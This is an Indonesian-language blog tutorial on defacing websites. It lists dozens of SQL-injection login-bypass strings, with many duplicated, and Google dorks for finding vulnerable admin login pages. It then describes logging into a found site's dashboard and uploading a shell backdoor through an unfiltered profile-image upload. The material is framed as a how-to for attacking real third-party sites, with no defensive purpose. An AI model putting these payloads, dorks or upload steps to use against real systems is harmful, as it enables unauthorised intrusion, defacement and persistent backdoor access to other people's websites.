Cara kerja teknik poc bypass admin ini sebenarnya cukup simple, yakni karena tidak ada filterisasi karakter pada halaman login. Hanya dengan memasukan code SQL injection seseorang dapat masuk ke dashboard. Tanpa harus memiliki username dan password yang benar.
Cara Deface Bypass Admin Login Panel Upload Shell
Untuk melakukan teknik Bypass biasanya seorang attacker atau Hacker dan Defacer ini melakukan teknik dengan memasukan Query SQL inject. Yang biasanya berupa '=''OR' dan ' or 1=1 limit 1 -- -+ dengan menggunakan code inject ini maka hasilnya akan menjadi username:true password:true.
Berikut Beberapa Code SQL Injection Bypass Admin
' or 1=1 limit 1 -- -+
'=''OR'
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
Dengan Code SQL Injection tersebut seorang Hacker dapat memanipulasi Login Admin Dan Me-bypassnya.Berhubung pada tutorial kali ini, kita membahas Cara Bypass Admin Login Panel dan Upload Shell. Berikut Simak Tutorialnya!
Daftar Dork Bypass Admin
Berikut adalah beberapa dork yang bisa kalian kembangkan sendiri untuk mencari situs yang dapat di Bypass.
- inurl:/admin/login.php id=
- inurl /admin/login.php site
- inurl:login/administrator.php
- inurl:admin/addblog.???
- inurl:adminhome.php
Dan untuk mengembangkan Doork Google, kalian bisa cari artikelnya di blog ini, bahkan di tulis dengan lengkap tutorialnya.
Menentukan Halaman Login
Cara yang pertama adalah kalian harus mencari halaman login admin tentunya, biasanya dengan mengakses /admin/ atau /admin/login maka akan muncul form untuk Login.
Disini sebagai contoh saya menemukan sebuah website yang VULN dengan Bypass Admin. Maka saya tinggal masukan code SQL Injection nya. Maka saya berhasil masuk ke dashboard admin.
Mencari Halaman Form Upload Shell Backdoor
Setiap website dashboardnya pasti berbeda-beda, jika kalian sudah berada di halaman dashboard admin ini. langkah selanjutnya ialah kalian mencari halaman form upload. entah itu gambar, file, dokumen atau semacamnya.
Karena di target kali ini saya tidak menemukan forum, maka saya mencoba untuk mengganti gambar profilenya dengan shell backdoor. Kebetulan juga ternyata pada saat saya mengupload shell backdoor ini tidak ada filtering extension untuk upload file nya. Maka saya tidak perlu melakukan bypass extension.
Mencari Letak Shell Backdoor
Langkah selanjutnya kalian tinggal mengaksesnya, nah kebetulan di target saya ini di Gambar profile. Biasanya gambar yang sudah di ubah atau di ganti dengan extension file maka gambarnya akan rusak seperti contoh gambar.
Apabila kalian menemukan target yang juga upload shell nya di gambar, kalian tinggal pencet gambarnya dan buka di tab baru atau dengan click kanan.
Maka otomatis akan mengakses ke file shell backdoor kalian. Dan Boom. Shell Backdoor kalian berhasil terupload. Maka kalian sudah bisa melakukan tujuan kalian. Dan ingat setiap perbuatan pasti ada sebab dan akibat. Semoga Bermanfaat.
Harap Tidak Menggunakan Link, Spam, Dan Malware